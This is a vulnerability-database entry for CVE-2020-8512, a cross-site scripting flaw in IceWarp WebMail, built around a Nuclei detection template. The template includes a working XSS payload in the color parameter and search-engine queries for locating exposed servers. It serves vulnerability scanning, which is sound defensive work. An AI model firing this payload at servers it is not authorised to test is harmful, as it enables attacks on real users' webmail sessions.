Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2020-8512
HistoryJun 26, 2020 - 3:44 a.m.

IceWarp WebMail Server <=11.4.4.1 - Cross-Site Scripting

2020-06-2603:44:54
ProjectDiscovery
github.com
15

CVSS2

4.3

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

CVSS3

6.1

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

EPSS

0.008

Percentile

81.8%

IceWarp Webmail Server through 11.4.4.1 contains a cross-site scripting vulnerability in the /webmail/ color parameter.

id: CVE-2020-8512

info:
  name: IceWarp WebMail Server <=11.4.4.1 - Cross-Site Scripting
  author: pdteam,dwisiswant0
  severity: medium
  description: IceWarp Webmail Server through 11.4.4.1 contains a cross-site scripting vulnerability in the /webmail/ color parameter.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the victim's browser, potentially leading to session hijacking, data theft, or other malicious activities.
  remediation: |
    Upgrade to a patched version of IceWarp WebMail Server (>=11.4.4.2) or apply the vendor-provided patch to mitigate the vulnerability.
  reference:
    - https://www.exploit-db.com/exploits/47988
    - https://twitter.com/sagaryadav8742/status/1275170967527006208
    - https://cxsecurity.com/issue/WLB-2020010205
    - https://packetstormsecurity.com/files/156103/IceWarp-WebMail-11.4.4.1-Cross-Site-Scripting.html
    - https://nvd.nist.gov/vuln/detail/CVE-2020-8512
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2020-8512
    cwe-id: CWE-79
    epss-score: 0.00692
    epss-percentile: 0.80113
    cpe: cpe:2.3:a:icewarp:icewarp_server:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: icewarp
    product: icewarp_server
    shodan-query:
      - title:"icewarp"
      - http.title:"icewarp"
    fofa-query: title="icewarp"
    google-query: intitle:"icewarp"
  tags: cve,cve2020,edb,packetstorm,xss,icewarp

http:
  - method: GET
    path:
      - '{{BaseURL}}/webmail/?color=%22%3E%3Csvg/onload=alert(document.domain)%3E%22'

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "<svg/onload=alert(document.domain)>"
          - "<strong>IceWarp"
        condition: and

      - type: word
        part: header
        words:
          - "text/html"

      - type: status
        status:
          - 200
# digest: 4a0a00473045022064f746865056ed76e956f9d74d87a6521eb9fb40f81edad4935261d255f07e65022100e59247a07f93b55b06016bb399dffa3ea7a02c044dfae518b091a1e46339d43b:922c64590222798bb761d5b6d8e72950

CVSS2

4.3

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

CVSS3

6.1

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

EPSS

0.008

Percentile

81.8%